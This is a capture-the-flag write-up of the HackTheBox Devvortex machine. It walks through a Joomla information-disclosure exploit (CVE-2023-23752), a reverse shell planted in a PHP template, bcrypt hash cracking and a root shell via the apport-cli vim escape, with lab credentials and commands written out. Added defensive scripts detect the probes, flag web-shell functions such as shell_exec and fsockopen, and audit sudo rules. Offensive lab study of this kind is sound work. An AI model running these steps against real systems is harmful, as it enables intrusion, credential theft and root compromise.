
HackTheBox Devvortex

Writeup for HackTheBox Devvortex


Machine Synopsis

Devvortex is an easy-difficulty Linux machine that features a Joomla CMS that is vulnerable to information disclosure. Accessing the service's configuration file reveals plaintext credentials that lead to Administrative access to the Joomla instance. With administrative access, the Joomla template is modified to include malicious PHP code and gain a shell. After gaining a shell and enumerating the database contents, hashed credentials are obtained, which are cracked and lead to SSH access to the machine. Post-exploitation enumeration reveals that the user is allowed to run apport-cli as root, which is leveraged to obtain a root shell. (Source)

Key exploitation techniques:

  • Joomla Information Disclosure (CVE-2023-23752)
  • Joomla Administrative Access via plaintext credentials
  • Joomla Template Modification for RCE (webshell upload)
  • Database credential extraction and hash cracking (bcrypt)
  • SSH for initial user access
  • apport-cli Privilege Escalation (CVE-2023-1326) via sudo misconfiguration

Enumeration

$ nmap -sC -sV 10.10.11.242

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan identified SSH (OpenSSH 8.2p1) on port 22 and nginx 1.18.0 on port 80, with the web server redirecting to http://devvortex.htb/.

[screenshot: webpage]

gobuster was used for directory and subdomain enumeration. No interesting directories were found, but a dev.devvortex.htb subdomain was discovered.

# Directory enumeration (no interesting results)
$ gobuster dir -u http://devvortex.htb -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt -t 50 -q
/images               (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css                  (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js                   (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]

# Subdomain enumeration
$ gobuster vhost -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -q
Found: dev.devvortex.htb Status: 200 [Size: 23221]

The dev.devvortex.htb subdomain was added to /etc/hosts.

$ echo -e '10.10.11.242\tdev.devvortex.htb' | sudo tee -a /etc/hosts

[screenshot: dev_webpage]

Browsing dev.devvortex.htb and then /robots.txt revealed common Joomla paths, including /administrator/.

# From http://dev.devvortex.htb/robots.txt
User-agent: *
Disallow: /administrator/
Disallow: /api/
...

Accessing /administrator/ presented a Joomla login page. The Joomla version was identified from /README.txt.

[screenshot: dev_administrator_webpage]

[screenshot: dev_readme]

Joomla Information Disclosure (CVE-2023-23752)

The Joomla 4.x version identified from README.txt is vulnerable to CVE-2023-23752, an information-disclosure vulnerability in the Joomla web-services API that lets unauthenticated clients read sensitive configuration data. It was exploited to retrieve the user list and the application configuration, including the database credentials.

# Retrieve user information
$ curl "http://dev.devvortex.htb/api/index.php/v1/users?public=true" | jq .
{
  "links": { ... },
  "data": [
    {
      "type": "users", "id": "649", "attributes": { "id": 649, "name": "lewis", "username": "lewis", "email": "lewis@devvortex.htb", "group_names": "Super Users" }
    },
    {
      "type": "users", "id": "650", "attributes": { "id": 650, "name": "logan paul", "username": "logan", "email": "logan@devvortex.htb", "group_names": "Registered" }
    }
  ],
  "meta": { "total-pages": 1 }
}

# Retrieve application configuration
$ curl "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .
{
  "links": { ... },
  "data": [
  ...
    { "type": "application", "id": "224", "attributes": { "user": "lewis", "id": 224 } },
    { "type": "application", "id": "224", "attributes": { "password": "P4ntherg0t1n5r3c0n##", "id": 224 } },
    { "type": "application", "id": "224", "attributes": { "db": "joomla", "id": 224 } },
    { "type": "application", "id": "224", "attributes": { "dbprefix": "sd4fg_", "id": 224 } },
  ...
  ],
  "meta": { "total-pages": 4 }
}

This disclosed two users (lewis, logan) and the database credentials lewis:P4ntherg0t1n5r3c0n##.
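From the defender's side, the two requests above leave a distinctive trace in the web server's access log: a GET to a Joomla web-services route with public=true in the query string, answered with a 200. The following Python script, added here as an example and not part of the original writeup, parses nginx "combined" format log lines (an assumed format; adjust LOG_RE for custom formats) and reports such requests. The log lines in SAMPLE_LOG are constructed; the verdict rule (200 means the data was served, anything else means the probe was refused) assumes a default Joomla install.

```python
"""Detect CVE-2023-23752 probes in nginx access logs.

Added example for this writeup, not code from the original post. The log
lines in SAMPLE_LOG are constructed; the log format is assumed to be nginx's
default "combined" format.
"""
import re

# Joomla 4 web-service endpoints that CVE-2023-23752 exposed to unauthenticated
# clients when the request carried public=true (both spellings of the API path).
SENSITIVE_API_PATHS = (
    "/api/index.php/v1/config/application",
    "/api/index.php/v1/users",
    "/api/v1/config/application",
    "/api/v1/users",
)

# nginx "combined" format: ip - user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_cve_2023_23752_probe(entry):
    """True when the request targets a sensitive API route with public=true."""
    url, _, query = entry["path"].partition("?")
    if not any(url.startswith(p) for p in SENSITIVE_API_PATHS):
        return False
    # Without public=true Joomla demands an API token, so that alone is not a probe.
    return "public=true" in query.lower()


def classify(entry):
    """A 200 means the configuration or user data was actually served."""
    return "disclosed" if entry["status"] == "200" else "blocked"


def find_probes(lines):
    """Return (entry, verdict) pairs for every parsable line that is a probe."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_cve_2023_23752_probe(entry):
            hits.append((entry, classify(entry)))
    return hits


# Constructed sample: one normal page view, two probes, one tokenless API call
# that was refused normally, and one line that does not parse.
SAMPLE_LOG = [
    '10.10.14.16 - - [26/Nov/2023:10:15:01 +0000] "GET / HTTP/1.1" 200 23221 "-" "Mozilla/5.0"',
    '10.10.14.16 - - [26/Nov/2023:10:15:09 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 987 "-" "curl/8.4.0"',
    '10.10.14.16 - - [26/Nov/2023:10:15:12 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1532 "-" "curl/8.4.0"',
    '10.10.14.16 - - [26/Nov/2023:10:15:20 +0000] "GET /api/index.php/v1/users HTTP/1.1" 401 0 "-" "curl/8.4.0"',
    "not a log line",
]

if __name__ == "__main__":
    for entry, verdict in find_probes(SAMPLE_LOG):
        print(f"{verdict:9} {entry['ip']} {entry['path']} -> {entry['status']}")
```

Run against a real access.log by replacing SAMPLE_LOG with the file's lines; a "disclosed" verdict on the config/application route means the database password was handed out and should be rotated, not just the Joomla install patched.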

Exploitation

Joomla RCE (www-data) via Template Modification

The obtained credentials lewis:P4ntherg0t1n5r3c0n## were used to log into the Joomla administrator dashboard.

Within the dashboard, the “System” tab offered “Site Templates” management.

[screenshot: joomla_dashboard]

[screenshot: joomla_dashboard_system]

[screenshot: joomla_dashboard_administrator_templates]

[screenshot: joomla_dashboard_administrator_templates_2]

The atum template’s error.php file was selected for modification. A malicious PHP reverse shell payload was inserted into error.php and saved.

<?php
// PHP reverse shell payload
// Example:
// set_time_limit (0);
// $ip = '10.10.14.16';
// $port = 9999;
// ... (full payload)
?>

[screenshot: joomla_dashboard_administrator_templates_reverseshell]

A netcat listener was started on the attacking machine. The error.php page was then accessed via curl, triggering the reverse shell.

# On attacker, set up Netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...

# Trigger webshell
$ curl "http://dev.devvortex.htb/administrator/templates/atum/error.php"

# Reverse shell received
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.242] 57428
bash: cannot set terminal process group (853): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/administrator/templates/atum$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

This provided a shell as www-data.
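The template editor makes this step look legitimate to Joomla, but not to the filesystem: error.php changes on disk, and the new content calls functions a template never needs. The following Python script, added here as an example and not code from the original writeup or from Joomla, takes a SHA-256 baseline of a template tree and reports added, modified or deleted files, tagging PHP files that contain the socket or process functions typical of web shells. The directory tree, file contents and indicator list in demo() are constructed for the example.

```python
"""File-integrity check for a Joomla template directory.

Added example for this writeup, not code from the original post or from
Joomla. The paths, file contents and indicator list are constructed.
"""
import hashlib
import os
import tempfile

# PHP functions a site template has no reason to call; their presence in a
# changed file is a strong web-shell indicator (constructed list, extend as needed).
SUSPICIOUS_PHP_CALLS = ("fsockopen", "proc_open", "shell_exec", "passthru", "popen", "system(")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root):
    """Map relative path -> sha256 for every file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            result[os.path.relpath(full, root)] = sha256_file(full)
    return result


def suspicious_calls(path):
    """Return the indicator strings found in a file (empty list if unreadable)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as f:
            text = f.read()
    except OSError:
        return []
    return [c for c in SUSPICIOUS_PHP_CALLS if c in text]


def compare(base, root):
    """Return sorted (relpath, status, indicators) for files that differ from the baseline."""
    findings = []
    current = baseline(root)
    for rel, digest in current.items():
        if rel not in base:
            status = "added"
        elif base[rel] != digest:
            status = "modified"
        else:
            continue
        calls = suspicious_calls(os.path.join(root, rel)) if rel.endswith(".php") else []
        findings.append((rel, status, calls))
    for rel in base:
        if rel not in current:
            findings.append((rel, "deleted", []))
    return sorted(findings)


def demo():
    """Build a constructed atum-like template tree, baseline it, then simulate the edit."""
    with tempfile.TemporaryDirectory() as root:
        tmpl = os.path.join(root, "administrator", "templates", "atum")
        os.makedirs(tmpl)
        with open(os.path.join(tmpl, "error.php"), "w") as f:
            f.write("<?php\n// original error page (constructed)\necho 'Error';\n")
        with open(os.path.join(tmpl, "index.php"), "w") as f:
            f.write("<?php\n// original index (constructed)\n")
        base = baseline(root)
        # Simulated tampering: an injected socket call appended to error.php and a
        # dropped file; both are constructed fragments, not a working payload.
        with open(os.path.join(tmpl, "error.php"), "a") as f:
            f.write("$sock = fsockopen($host, $port); // injected (constructed)\n")
        with open(os.path.join(tmpl, "shell.php"), "w") as f:
            f.write("<?php shell_exec($_GET['c']); ?>\n")
        return compare(base, root)


if __name__ == "__main__":
    for rel, status, calls in demo():
        print(f"{status:9} {rel} {calls}")
```

In production the baseline would be stored off-host and compared on a schedule; Joomla's own Super User login events and the template editor's save actions are the matching application-level signals.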

Database Credential Extraction (logan)

With www-data access, the internal MySQL database was accessed using the previously found lewis credentials.

www-data@devvortex:/home/logan$ mysql -h 127.0.0.1 -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##
...
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| performance_schema |
+--------------------+

mysql> use joomla;
Database changed

mysql> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
...
| sd4fg_user_keys               |
| sd4fg_user_mfa                |
| sd4fg_user_notes              |
| sd4fg_user_profiles           |
| sd4fg_user_usergroup_map      |
| sd4fg_usergroups              |
| sd4fg_users                   |
...

mysql> select username, password from sd4fg_users; 
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| lewis    | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan    | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+

The database contained password hashes for lewis and logan. The hash for logan ($2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12) was extracted and cracked using john.

$ echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > logan_hash
$ john logan_hash --wordlist=/usr/share/wordlists/rockyou.txt
...
tequieromucho    (?)
Session completed.

The password for logan was tequieromucho. SSH access was gained using these credentials.

$ ssh logan@10.10.11.242
logan@10.10.11.242's password: tequieromucho
logan@devvortex:~$

Privilege Escalation

apport-cli Abuse (CVE-2023-1326)

sudo -l as logan revealed that apport-cli could be run as root without a password.

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
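A sudo rule like this one is easy to miss in a review because apport-cli is not an obvious shell. The following Python script, added here as an example and not part of the original writeup, parses sudo -l output into rules and flags commands that run as root and hand the caller an interactive editor or pager (apport-cli shows its report in vim, as this writeup goes on to demonstrate), as well as ALL and NOPASSWD rules. SUDO_L_OUTPUT is the writeup's own sudo -l output; the EDITOR_SPAWNERS list is an assumption to be extended for the environment being audited.

```python
"""Audit sudo rules for binaries that hand the caller an interactive editor or pager.

Added example for this writeup, not part of the original post. SUDO_L_OUTPUT
is the writeup's own sudo -l output; EDITOR_SPAWNERS is an assumed list.
"""
import os
import re

# Binaries that open an editor or pager when run. apport-cli shows the report
# in vim (as the writeup demonstrates); the others have their own shell escapes.
EDITOR_SPAWNERS = {"apport-cli", "vim", "vi", "less", "more", "man"}

# One sudo -l rule line: "(runas_user : runas_group) TAG: cmd1, cmd2"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:(?:NOPASSWD|PASSWD|NOEXEC|SETENV):\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)


def parse_sudo_l(output):
    """Extract the rule lines from sudo -l output; Defaults lines are ignored."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").strip(),
            "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit(rules):
    """Return (command, reason) findings for rules that are risky when run as root."""
    findings = []
    for rule in rules:
        runas_user = rule["runas"].split(":")[0].strip()
        as_root = runas_user in ("ALL", "root")
        for cmd in rule["commands"]:
            if cmd == "ALL":
                findings.append((cmd, "unrestricted command set (ALL)"))
                continue
            parts = cmd.split()
            if not parts:
                continue
            binary = os.path.basename(parts[0])
            if as_root and binary in EDITOR_SPAWNERS:
                findings.append((cmd, f"{binary} opens an interactive editor/pager as root"))
        if as_root and "NOPASSWD" in rule["tags"]:
            findings.append((", ".join(rule["commands"]),
                             "NOPASSWD: runs as root without re-authentication"))
    return findings


# The sudo -l output from the writeup (raw string so the \: in secure_path survives).
SUDO_L_OUTPUT = r"""Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
"""

if __name__ == "__main__":
    for cmd, reason in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{cmd}: {reason}")
```

The remediation the finding points at is either removing the rule (crash reports can be filed without root) or updating apport to a build that does not open the report in an editor escape, and in any case not adding NOPASSWD to it.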

Checking apport-cli's version (2.20.11) confirmed that it is affected by CVE-2023-1326. Because apport-cli opens the crash report in vim when the user chooses to view it, the viewer's shell escape allows arbitrary commands to run with apport-cli's privileges, which under the sudo rule above are root's.

logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11

To exploit this, apport-cli -f was used to generate a new report.

logan@devvortex:~$ sudo /usr/bin/apport-cli -f

*** What kind of problem do you want to report?
...
Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 # Choose any option, e.g., Display
...
*** What display problem do you observe?
...
Please choose (1/2/3/4/5/6/7/8/C): 2 # Choose any option, e.g., Freezes or hangs
...
Press any key to continue...
...
*** Send problem report to the developers?
...
Please choose (S/V/K/I/C): V # Choose View report

Selecting “V” (View report) opened the report in vim. Within vim, entering !/bin/bash (followed by Enter) escaped to a root shell.

# In vim viewer, type:
!/bin/bash
# Press Enter
root@devvortex:/home/logan#

This successfully granted a root shell.

This post is licensed under CC BY 4.0 by the author.